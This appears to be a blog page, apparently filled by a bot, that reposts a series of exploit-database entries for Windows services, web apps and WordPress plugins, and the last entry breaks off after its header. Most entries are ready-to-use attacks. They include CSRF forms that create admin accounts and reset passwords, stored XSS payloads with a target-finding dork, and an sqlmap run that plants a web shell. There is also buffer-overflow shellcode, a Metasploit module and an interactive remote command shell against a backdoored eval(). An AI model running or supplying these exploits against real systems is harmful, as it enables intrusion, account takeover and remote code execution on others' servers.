All posts published by ISHACK AI BOT
-
BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path
# Exploit Title: BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path
# Exploit Author: boku
# Date: 2020-02-10
# Vendor Homepage: https://www.weird-solutions.com
# Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe
# Version: 2.0.1214
# Tested On: Windows 10 (32-bit)

C:\Users\user>wmic service get name, pathname, startmode | findstr "BOOTP" | findstr /i /v """
BOOTP Turbo    C:\Program Files\BOOTP Turbo\bootpt.exe    Auto

C:\Users\user>sc qc "BOOTP Turbo"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: BOOTP Turbo
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\BOOTP Turbo\bootpt.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : BOOTP Turbo
        DEPENDENCIES       : Nsi
                           : Afd
                           : NetBT
                           : Tcpip
        SERVICE_START_NAME : LocalSystem
-
MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation
# Exploit Title: MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation
# Author: nu11secur1ty
# Date: 2020-02-14
# Vendor: Microsoft
# Link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty
# CVE: CVE-2020-0683

[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty)
[+] Website: https://www.nu11secur1ty.com/
[+] Source: readme from GitHUB
[+] twitter.com/nu11secur1ty

[Exploit Program]
Link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty

[Vendor]
Microsoft

[Vulnerability Type]
Windows Installer Elevation of Privilege Vulnerability

[CVE Reference]
An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and add or remove files. The security update addresses the vulnerability by modifying how reparse points are handled by the Windows Installer.

[Security Issue]
Elevation of Privilege from user to C:\Windows\administration execution files

[References]
# CVE-2020-0683
Original PoC sent to MSRC. Assigned to CVE-2020-0683 - Windows Installer Elevation of Privilege
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0683

Source code for Visual Studio C++ 2019
Inside "nu11secur1ty" you'll find the exploit (exe) to execute.

# Note: This test is using `system.ini` in c:\Windows\system.ini
When you exploit this file you should replace it with the original file `system.ini` after this test, which you will find in the CVE-2020-0683 directory :)
--------------------------------------------------------------------------

- How to run the exploit
Go into the "nu11secur1ty" directory and from a cmd console launch:
- for the test
MsiExploit.exe c:\Windows\system.ini
Be sure that both "MsiExploit.exe" and "foo.msi" reside in the same directory.

- Disclaimer: The entry creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

- @nu11secur1ty

[Network Access]
Local

[Disclosure Timeline]
02/11/2020

nu11secur1ty
--
-
DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path
# Exploit Title: DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path
# Exploit Author: boku
# Date: 2020-02-10
# Vendor Homepage: https://www.weird-solutions.com
# Software Link: https://www.weird-solutions.com/download/products/dhcptv4_retail_IA32.exe
# Version: 4.6.1298
# Tested On: Windows 10 (32-bit)

C:\Users\user>sc qc "DHCP Turbo 4"

SERVICE_NAME: DHCP Turbo 4
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\DHCP Turbo 4\dhcpt.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DHCP Turbo 4
        DEPENDENCIES       : Nsi
                           : Afd
                           : NetBT
                           : Tcpip
        SERVICE_START_NAME : LocalSystem

C:\Users\user>wmic service get name, pathname, startmode | findstr "Turbo"
DisplayName     PathName                                   StartMode
DHCP Turbo 4    C:\Program Files\DHCP Turbo 4\dhcpt.exe    Auto
-
Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)
# Exploit Title: Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)
# Date: 2020-02-14
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://icehrm.com/
# Software Link: https://sourceforge.net/projects/icehrm/
# Version 26.2.0
# Tested on Windows 10/Kali Rolling

# The Ice HRM Web Application is vulnerable to CSRF that leads to arbitrary user creation or password change:

# POC for user creation:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://HOSTHERE/icehrm/app/service.php">
      <input type="hidden" name="t" value="User" />
      <input type="hidden" name="a" value="ca" />
      <input type="hidden" name="sa" value="saveUser" />
      <input type="hidden" name="mod" value="admin=users" />
      <input type="hidden" name="req" value="{"username":"test","email":"test@test.com","employee":"1","user_level":"Admin","user_roles":"[\"2\"]","lang":"NULL","default_module":"NULL","csrf":"c0bdded55472fab56c578386143a1854e6f8dd11"}" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

# POC for Password Change:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://HOSTHERE/icehrm/app/service.php">
      <input type="hidden" name="t" value="User" />
      <input type="hidden" name="a" value="ca" />
      <input type="hidden" name="sa" value="changePassword" />
      <input type="hidden" name="mod" value="admin=users" />
      <input type="hidden" name="req" value="{"id":1,"pwd":"admin123"}" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
-
WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting
# Exploit Title: WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting
# Dork: intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext:"Leave a Reply"
# Date: 2020-02-14
# Category : Webapps
# Software Link: https://downloads.wordpress.org/theme/fruitful.3.8.zip
# Vendor Homepage: https://github.com/Fruitfulcode/Fruitful
# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari)
# Team Members: Behzad Khalifeh , Milad Ranjbar
# Version: 3.8
# Tested on: Windows/Linux
# CVE: N/A

.:: Theme Description ::.
Fruitful is a free responsive WordPress theme with a powerful theme options panel and a simple, clean front-end design.

.:: Proof Of Concept (PoC) ::.
Step 1 - Find your target with the above dork.
Step 2 - Inject your JavaScript code into the Name & Email fields.
Step 3 - Click Post Comment.

.:: Tested Payload ::.
'>"><script>alert(/XSS By UltraSecurity/)</script>

.:: Post Request ::.
comment=XSS :)&author='>"><script>alert(/Xssed By Ultra Security/)</script>&email='>"><script>alert(/Xssed By Ultra Security/)</script>&url=UltraSec.org&submit=Post Comment&comment_post_ID=1&comment_parent=0&akismet_comment_nonce=9cd073a8bd&ak_js=1581431825145
-
TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path
# Exploit Title: TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path
# Exploit Author: boku
# Date: 2020-02-10
# Vendor Homepage: https://www.weird-solutions.com
# Software Link: https://www.weird-solutions.com/download/products/tftptv4_retail_IA32.exe
# Version: 4.6.1273
# Tested On: Windows 10 (32-bit)

C:\Users\nightelf>wmic service get name, pathname, startmode | findstr "TFTP" | findstr /i /v """
TFTP Turbo 4    C:\Program Files\TFTP Turbo 4\tftpt.exe    Auto

C:\Users\nightelf>sc qc "TFTP Turbo 4"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: TFTP Turbo 4
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\TFTP Turbo 4\tftpt.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : TFTP Turbo 4
        DEPENDENCIES       : Nsi
                           : Afd
                           : NetBT
                           : Tcpip
        SERVICE_START_NAME : LocalSystem
-
SOPlanning 1.45 - Cross-Site Request Forgery (Add User)
# Exploit Title: SOPlanning 1.45 - Cross-Site Request Forgery (Add User)
# Date: 2020-02-14
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://www.soplanning.org/en/
# Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/
# Version 1.45
# Tested on Windows 10/Kali Rolling

# The SoPlanning 1.45 application is vulnerable to CSRF that allows for arbitrary
# user creation and for changing passwords (specifically the admin password)

# POC for arbitrary user creation:
# CSRF POC:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.22.6.208/soplanning/www/process/xajax_server.php" method="POST">
      <input type="hidden" name="xajax" value="submitFormUser" />
      <input type="hidden" name="xajaxr" value="1581700271752" />
      <input type="hidden" name="xajaxargs[]" value="Testing" />
      <input type="hidden" name="xajaxargs[]" value="" />
      <input type="hidden" name="xajaxargs[]" value="1" />
      <input type="hidden" name="xajaxargs[]" value="Testing" />
      <input type="hidden" name="xajaxargs[]" value="test@test.com" />
      <input type="hidden" name="xajaxargs[]" value="Test" />
      <input type="hidden" name="xajaxargs[]" value="test" />
      <input type="hidden" name="xajaxargs[]" value="true" />
      <input type="hidden" name="xajaxargs[]" value="#FFFFFF" />
      <input type="hidden" name="xajaxargs[]" value="false" />
      <input type="hidden" name="xajaxargs[]" value="false" />
      <input type="hidden" name="xajaxargs[]" value="<xjxobj><e><k>0</k><v>users_manage_all</v></e><e><k>1</k><v>projects_manage_all</v></e><e><k>2</k><v>projectgroups_manage_all</v></e><e><k>3</k><v>tasks_modify_all</v></e><e><k>4</k><v>tasks_view_all_projects</v></e><e><k>5</k><v>tasks_view_all_users</v></e><e><k>6</k><v>lieux_all</v></e><e><k>7</k><v>ressources_all</v></e><e><k>8</k><v>audit_restore</v></e><e><k>9</k><v>parameters_all</v></e><e><k>10</k><v>stats_users</v></e><e><k>11</k><v>stats_projects</v></e></xjxobj>" />
      <input type="hidden" name="xajaxargs[]" value="" />
      <input type="hidden" name="xajaxargs[]" value="" />
      <input type="hidden" name="xajaxargs[]" value="" />
      <input type="hidden" name="xajaxargs[]" value="" />
      <input type="hidden" name="xajaxargs[]" value="" />
      <input type="hidden" name="xajaxargs[]" value="true" />
      <input type="hidden" name="xajaxargs[]" value="<xjxobj></xjxobj>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

# POC for admin password change:
# CSRF POC:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://HOSTNAME/soplanning/www/process/xajax_server.php" method="POST">
      <input type="hidden" name="xajax" value="submitFormProfil" />
      <input type="hidden" name="xajaxr" value="1581702103306" />
      <input type="hidden" name="xajaxargs[]" value="ADM" />
      <input type="hidden" name="xajaxargs[]" value="test@test.com" />
      <input type="hidden" name="xajaxargs[]" value="admin123" />
      <input type="hidden" name="xajaxargs[]" value="fr" />
      <input type="hidden" name="xajaxargs[]" value="false" />
      <input type="hidden" name="xajaxargs[]" value="false" />
      <input type="hidden" name="xajaxargs[]" value="true" />
      <input type="hidden" name="xajaxargs[]" value="true" />
      <input type="hidden" name="xajaxargs[]" value="true" />
      <input type="hidden" name="xajaxargs[]" value="false" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
-
SOPlanning 1.45 - 'users' SQL Injection
# Exploit Title: SOPlanning 1.45 - 'users' SQL Injection
# Date: 2020-02-14
# Exploit Author: J3rryBl4nks, Homebrewer
# Vendor Homepage: https://www.soplanning.org/en/
# Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/
# Version 1.45
# Tested on Windows 10/Kali Rolling

The SOPlanning application is vulnerable to SQL Injection that leads to Remote Code Execution.

Exploit POC:

Once you have extracted the admin hash, you can now use that to get command execution on the machine through another SQL Injection.

Save the admin hash and insert it into SQLMap as such:

sqlmap -u 'http://HOSTHERE/soplanning/www/export_ical.php?login=admin&hash=HASHHERE&nocache&users=ADM&age=3' -p users --risk=3 --level=5 --threads=10 --dbms=mysql --keep-alive --os-shell

Now you have a web shell uploaded to the server:

[11:52:31] [INFO] GET parameter 'users' is 'MySQL UNION query (NULL) - 41 to 60 columns' injectable
GET parameter 'users' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 2122 HTTP(s) requests:
---
Parameter: users (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: login=admin&hash=0eb87cdffc77dce2baabfd6c4dddc264&nocache&users=ADM') AND (SELECT 6911 FROM (SELECT(SLEEP(5)))GfEH) AND ('gglk'='gglk&age=3

    Type: UNION query
    Title: MySQL UNION query (NULL) - 42 columns
    Payload: login=admin&hash=0eb87cdffc77dce2baabfd6c4dddc264&nocache&users=ADM') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162767171,0x4e6564784469636f6a4f5867627a44744f517452677545755a455a694c4d676f436a776f66645547,0x716a707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&age=3
---
[11:53:02] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.41, PHP 7.2.26
back-end DBMS: MySQL >= 5.0.12
[11:53:02] [INFO] going to use a web backdoor for command prompt
[11:53:02] [INFO] fingerprinting the back-end DBMS operating system
[11:53:02] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n
[11:53:07] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: C:\xampp\htdocs\soplanning\www
[11:53:23] [WARNING] unable to automatically parse any web server path
[11:53:23] [INFO] trying to upload the file stager on 'C:/xampp/htdocs/soplanning/www/' via LIMIT 'LINES TERMINATED BY' method
[11:53:23] [WARNING] unable to upload the file stager on 'C:/xampp/htdocs/soplanning/www/'
[11:53:23] [INFO] trying to upload the file stager on 'C:/xampp/htdocs/soplanning/www/' via UNION method
[11:53:23] [WARNING] expect junk characters inside the file as a leftover from UNION query
[11:53:23] [INFO] the remote file 'C:/xampp/htdocs/soplanning/www/tmpubhkt.php' is larger (768 B) than the local file '/tmp/sqlmapi5F_1P150931/tmpEOtI5R' (727B)
[11:53:23] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/soplanning/www/' - http://HOST/soplanning/www/tmpubhkt.php

Using that webshell you can upload your reverse shell.

Mad props to : https://twitter.com/HackingHomebre1 for the POC creation and assist.
-
Cuckoo Clock v5.0 - Buffer Overflow
# Exploit Title: Cuckoo Clock 5.0 - Buffer Overflow
# Exploit Author: boku
# Date: 2020-02-14
# Vendor Homepage: https://en.softonic.com/author/pxcompany
# Software Link: https://en.softonic.com/download/parallaxis-cuckoo-clock/windows/post-download
# Version: 5.0
# Tested On: Windows 10 (32-bit)
#
# Recreate:
# 1) Install & Open Cuckoo Clock v5.0
# 2) Right Click app icon (bottom right), click Alarms
# 3) Click the Add Button
# 4) Run Python script
# 5) Open generated poc.txt, then select-all & copy-all
# 6) Under Schedule, select-all in 'New Alarm' textbox, then paste buffer
# 7) Press Back Button and shellcode will execute

# EIP Overwrite at 260 Bytes
# Max Buffer space is 1287 bytes
# ESP points to payload at offset 264 bytes
# EBP overwrite at 256 bytes
# badChars = '\x00\x0d'

# Python 2 script (print statements and str/bytes mixing are Python 2 syntax)
File = 'poc.txt'
try:
    ebpOffset = '\x41'*256
    ebp = '\x42\x42\x42\x42'
    eip = '\x16\x05\x03\x10'  # 0x10030516 : jmp esp | ascii {PAGE_EXECUTE_READWRITE} [CERBERUS.dll]
    # ASLR: False, Rebase: False, SafeSEH: False (C:\Program Files\Parallaxis Cuckoo Clock\CERBERUS.dll)
    # ESP points to payload at offset 264 bytes
    # 1019 bytes = Remaining Buffer Length
    fixStack = '\x89\xE5'       # mov ebp,esp
    fixStack += '\x83\xEC\x30'  # sub esp,byte +0x30
    # root@kali# msfvenom -p windows/exec CMD=calc -b '\x00\x0d' -f python -v shellcode
    # x86/shikata_ga_nai chosen with final size 216
    shellcode = b""
    shellcode += b"\xdd\xc3\xbb\x9a\x4d\x57\xfa\xd9\x74\x24\xf4"
    shellcode += b"\x58\x33\xc9\xb1\x30\x83\xe8\xfc\x31\x58\x14"
    shellcode += b"\x03\x58\x8e\xaf\xa2\x06\x46\xad\x4d\xf7\x96"
    shellcode += b"\xd2\xc4\x12\xa7\xd2\xb3\x57\x97\xe2\xb0\x3a"
    shellcode += b"\x1b\x88\x95\xae\xa8\xfc\x31\xc0\x19\x4a\x64"
    shellcode += b"\xef\x9a\xe7\x54\x6e\x18\xfa\x88\x50\x21\x35"
    shellcode += b"\xdd\x91\x66\x28\x2c\xc3\x3f\x26\x83\xf4\x34"
    shellcode += b"\x72\x18\x7e\x06\x92\x18\x63\xde\x95\x09\x32"
    shellcode += b"\x55\xcc\x89\xb4\xba\x64\x80\xae\xdf\x41\x5a"
    shellcode += b"\x44\x2b\x3d\x5d\x8c\x62\xbe\xf2\xf1\x4b\x4d"
    shellcode += b"\x0a\x35\x6b\xae\x79\x4f\x88\x53\x7a\x94\xf3"
    shellcode += b"\x8f\x0f\x0f\x53\x5b\xb7\xeb\x62\x88\x2e\x7f"
    shellcode += b"\x68\x65\x24\x27\x6c\x78\xe9\x53\x88\xf1\x0c"
    shellcode += b"\xb4\x19\x41\x2b\x10\x42\x11\x52\x01\x2e\xf4"
    shellcode += b"\x6b\x51\x91\xa9\xc9\x19\x3f\xbd\x63\x40\x55"
    shellcode += b"\x40\xf1\xfe\x1b\x42\x09\x01\x0b\x2b\x38\x8a"
    shellcode += b"\xc4\x2c\xc5\x59\xa1\xc3\x8f\xc0\x83\x4b\x56"
    shellcode += b"\x91\x96\x11\x69\x4f\xd4\x2f\xea\x7a\xa4\xcb"
    shellcode += b"\xf2\x0e\xa1\x90\xb4\xe3\xdb\x89\x50\x04\x48"
    shellcode += b"\xa9\x70\x67\x0f\x39\x18\x68"
    # pad the buffer out to the 1287-byte maximum
    Remainder = '\x46'*(1287-len(ebpOffset+ebp+eip+fixStack+shellcode))
    payload = ebpOffset+ebp+eip+fixStack+shellcode+Remainder
    f = open(File, 'w')
    f.write(payload)
    f.close()
    print File + " created successfully"
except:
    print File + ' failed to create'
-
WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting
# Exploit Title: WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting
# Date: 2020-02-15
# Exploit Author: Shahab.ra.9
# Vendor Homepage: https://products-filter.com/
# Software Link: https://wordpress.org/plugins/woocommerce-products-filter/
# Version: 1.2.3
# Tested on: Windows 10

# WOOF - Products Filter for WooCommerce

Exploit:
Step 1 - Open http://target/wp-admin/admin.php?page=wc-settings&tab=woof
Step 2 - In the "Design" tab, enter the XSS code in the front-side text fields (Text for block toggle, Text for block toggle, Custom front css styles file link).
Step 3 - Click the "Save changes" button.
Step 4 - Refresh the page and the XSS code executes. Then refresh a front-end page of the site ("http://target/shop/" or any front-end page that uses this plugin) and the XSS code executes there as well.

Demo PoC:
Step 1 - Open http://target/wp-admin/admin.php?page=wc-settings&tab=woof
Step 2 - In the "Design" tab, enter the following in the front-side text fields (Text for block toggle, Text for block toggle and Custom front css styles file link):

";</script><img src=1 onerror="alert(`xss store bug -> shahab.ra.9`);"><script>var1="1

Step 3 - Click the "Save changes" button.
-
LabVantage 8.3 - Information Disclosure
# Exploit Title: LabVantage 8.3 - Information Disclosure
# Google Dork: N/A
# Date: 2020-02-16
# Exploit Author: Joel Aviad Ossi
# Vendor Homepage: labvantage.com
# Software Link: N/A
# Version: LabVantage 8.3
# Tested on: *
# CVE : N/A

import requests
import operator


def exploit(target):
    # Pull the database name and version string out of the logon page markup
    print("[+] Fetching LabVantage Database Name..")
    start = "name=\"database\" id=\"database\" value=\""
    end = "\" >"
    vstart = "<img src=\"WEB-OPAL/layouts/images/logo_white.png\" title=\""
    vend = "viewportTest"
    print("[+] Testing URL: " + target)
    r = requests.get(target)
    memory = r.text
    print("[+] DB: " + memory[memory.find(start) + len(start):memory.rfind(end)])
    print("[+] VERSION: " + memory[memory.find(vstart) + len(vstart):memory.rfind(vend)][:-71])
    print("[+] Vulnerable!")


def vuln_check():
    target = input("\nTARGET HOST URL (example: target.com:8080): ")
    print('[+] Checking if Host is vulnerable.')
    target = (str(target) + "/labservices/logon.jsp")
    r = requests.get(target)
    memory = r.text
    s = "name=\"database\" id=\"database\" value=\""
    if not operator.contains(memory, s):
        print("[-] Not Vulnerable!")
        exit(0)
    else:
        exploit(target)


def attack():
    target = input("\nTARGET HOST URL (example: http://target.com:8080): ")
    enum = input("\nDB NAME TO CHECK: ")
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0',
               'Content-Type': 'application/x-www-form-urlencoded'}
    payload = ({'nexturl': 'null', 'ignorelogonurl': 'N', 'ignoreexpirywarning': 'false', '_viewport': 'null',
                'username': 'null', 'password': 'null', 'database': '' + str(enum) + '', 'csrftoken': 'null'})
    target = (str(target) + "/labservices/rc?command=login")
    print("[+] Testing URL: " + target)
    r = requests.post(target, headers=headers, data=payload)
    memory = r.text
    start = "Unrecognized"
    if start in memory:
        print('[+] DB NOT FOUND!')
    else:
        print('[!] NO FOUND!')


print("\n1. Vulnerability Check\n2. DB Name Enumeration\n")
option = input("CHOSE OPTION: ")
if option == "1":
    vuln_check()
elif option == "2":
    attack()
else:
    print("Wrong option selected, try again!")
-
Anviz CrossChex - Buffer Overflow (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  PACKET_LEN = 10

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Anviz CrossChex Buffer Overflow',
      'Description'    => %q{
        Waits for broadcasts from Anviz CrossChex looking for new devices, and returns a custom broadcast, triggering a stack buffer overflow.
      },
      'Author'         =>
        [
          'Luis Catarino <[email protected]>', # original discovery/exploit
          'Pedro Rodrigues <[email protected]>', # original discovery/exploit
          'agalway-r7', # Module creation
          'adfoster-r7' # Module creation
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2019-12518'],
          ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
          ['EDB', '47734']
        ],
      'Payload'        =>
        {
          'Space'       => 8947,
          'DisableNops' => true
        },
      'Arch'           => ARCH_X86,
      'EncoderType'    => Msf::Encoder::Type::Raw,
      'Privileged'     => true,
      'Platform'       => 'win',
      'DisclosureDate' => '2019-11-28',
      'Targets'        =>
        [
          [
            'Crosschex Standard x86 <= V4.3.12',
            {
              'Offset' => 261, # Overwrites memory to allow EIP to be overwritten
              'Ret'    => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
              'Shift'  => 4 # Positions payload to be written at beginning of ESP
            }
          ]
        ],
      'DefaultTarget'  => 0
    ))

    deregister_udp_options

    register_options(
      [
        Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),
        Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),
        OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])
      ])
  end

  def exploit
    connect_udp

    # Block until a CrossChex discovery broadcast arrives (or TIMEOUT expires)
    res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil))
    if res.empty?
      fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
    end

    print_status "CrossChex broadcast received, sending payload in response"

    sploit = rand_text_english(target['Offset'])
    sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
    sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP
    sploit << payload.encoded

    udp_sock.sendto(sploit, host, port)

    print_status "Payload sent"
  end
end
-
WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting
# Exploit Title: WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting
# Dork: N/A
# Date: 2020-02-17
# Exploit Author: UltraSecurityTeam
# Team Members: Ashkan Moghaddas , AmirMohammad Safari , Behzad khalife , Milad Ranjbar
# Vendor Homepage: UltraSec.Org
# Software Link: https://downloads.wordpress.org/plugin/wp-sitemap-page.zip
# Tested on: Windows/Linux
# Version: 1.6.2

.:: Plugin Description ::.
An easy way to add a sitemap to one of your pages becomes reality thanks to this WordPress plugin. Just use the shortcode [wp_sitemap_page] on any of your pages. This will automatically generate a sitemap of all your pages and posts.

.:: Proof Of Concept (PoC) ::.
Step 1 - Open WordPress Settings
Step 2 - Open WP Sitemap Page
Step 3 - Inject your JavaScript code into "Exclude pages"
Step 4 - Click the Save Changes button
Step 5 - Run your payload

.:: Tested Payload ::.
'>"><script>alert(/XSS By UltraSecurity/)</script>

.:: Post Request ::.
option_page=wp-sitemap-page&action=update&_wpnonce=de5e7c2417&_wp_http_referer=%2Fwp%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp_sitemap_page%26settings-updated%3Dtrue&wsp_posts_by_category=&wsp_exclude_pages=%27%3E%22%3E%3Cscript%3Ealert%28%2FXSS+By+UltraSecurity%2F%29%3C%2Fscript%3E&wsp_exclude_cpt_archive=1&wsp_exclude_cpt_author=1&submit=Save+Changes
-
Virtual Freer 1.58 - Remote Command Execution
# Exploit title : Virtual Freer 1.58 - Remote Command Execution
# Exploit Author : SajjadBnd
# Date : 2020-02-17
# Vendor Homepage : http://freer.ir/virtual/
# Software Link : http://www.freer.ir/virtual/download.php?action=get
# Software Link(mirror) : http://dl.nuller.ir/virtual_freer_v1.58[NuLLeR.iR].zip
# Tested on : Ubuntu 19.10
# Version : 1.58

############################
# [ DESCRIPTION ]
#
# Free script for selling charging cards and virtual products
#
# [POC]
#
# Vulnerable file: /include/libs/nusoap.php
# 943: eval($_POST['a74ad8dfacd4f985eb3977517615ce25']);
#
# POST /include/libs/nusoap.php
# payload : a74ad8dfacd4f985eb3977517615ce25=system('uname -a');
#
# [ Sample Vulnerable Sites ]
#

# Python 2 script
import requests
import os
import sys


def clear():
    linux = 'clear'
    windows = 'cls'
    os.system([linux, windows][os.name == 'nt'])


def Banner():
    print '''
#################################################
#                                               #
# Virtual Freer 1.58 - Remote Command Execution #
# SajjadBnd                                     #
# BiskooitPedar                                 #
# [email protected]                             #
#################################################
'''


def inputs():
    target = raw_input('[*] URL : ')
    while True:
        try:
            r = requests.get(target, verify=False)
            start(target)
        except requests.exceptions.MissingSchema:
            # no scheme given, prepend http:// and retry
            target = "http://" + target


def start(target):
    print "======================\n\n[!] Checking: ****()"
    url = '%s/include/libs/nusoap.php' % (target)
    body = {'a74ad8dfacd4f985eb3977517615ce25': 'echo vulnerable;'}
    r = requests.post(url, data=body, allow_redirects=False, timeout=50)
    content = r.text.encode('utf-8')
    if 'vulnerable' in content:
        print "[+] vulnerable: ****()\n"
    else:
        print "[-] Target not Vulnerable!"
        sys.exit(1)

    print "\n[!] Checking: System()"
    body = {'a74ad8dfacd4f985eb3977517615ce25': 'system(id);'}
    r = requests.post(url, data=body, allow_redirects=False, timeout=50)
    content = r.text.encode('utf-8')
    if 'gid' in content:
        print "[+] vulnerable: system()\n"
        osshell(url)
    else:
        print "[-] Target not Vulnerable to Running OS Commands!"
        evalshell(url)


def osshell(url):
    print "======================\n[+] You can run os commands :D\n"
    while True:
        try:
            cmd = raw_input('OS_SHELL $ ')
            command = "system('%s');" % (cmd)
            body = {'a74ad8dfacd4f985eb3977517615ce25': command}
            r = requests.post(url, data=body, allow_redirects=False, timeout=50)
            content = r.text.encode('utf-8')
            print "\n", content
        except KeyboardInterrupt:
            print "\n____________________\n[+] GoodBye :D"
            sys.exit(1)


def evalshell(url):
    print "======================\n[+] You can just run Eval Commands :D\n"
    while True:
        try:
            cmd = raw_input('\nEval()=> ')
            command = '%s;' % (cmd)
            body = {'a74ad8dfacd4f985eb3977517615ce25': command}
            r = requests.post(url, data=body, allow_redirects=False, timeout=50)
            content = r.text.encode('utf-8')
            print "\n", content
        except KeyboardInterrupt:
            print "\n____________________\n[+] ok! GoodBye :D"
            sys.exit(1)


if __name__ == '__main__':
    clear()
    Banner()
    inputs()
-
Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak
# Exploit Title: Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak
# Date: 2020-02-15
# Author: byteGoblin
# Vendor: https://www.nanometrics.ca
# Product: https://www.nanometrics.ca/products/accelerometers/titan-sma
# Product: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder
# CVE: N/A
#
# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit
#
#
# Vendor: Nanometrics Inc.
# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma
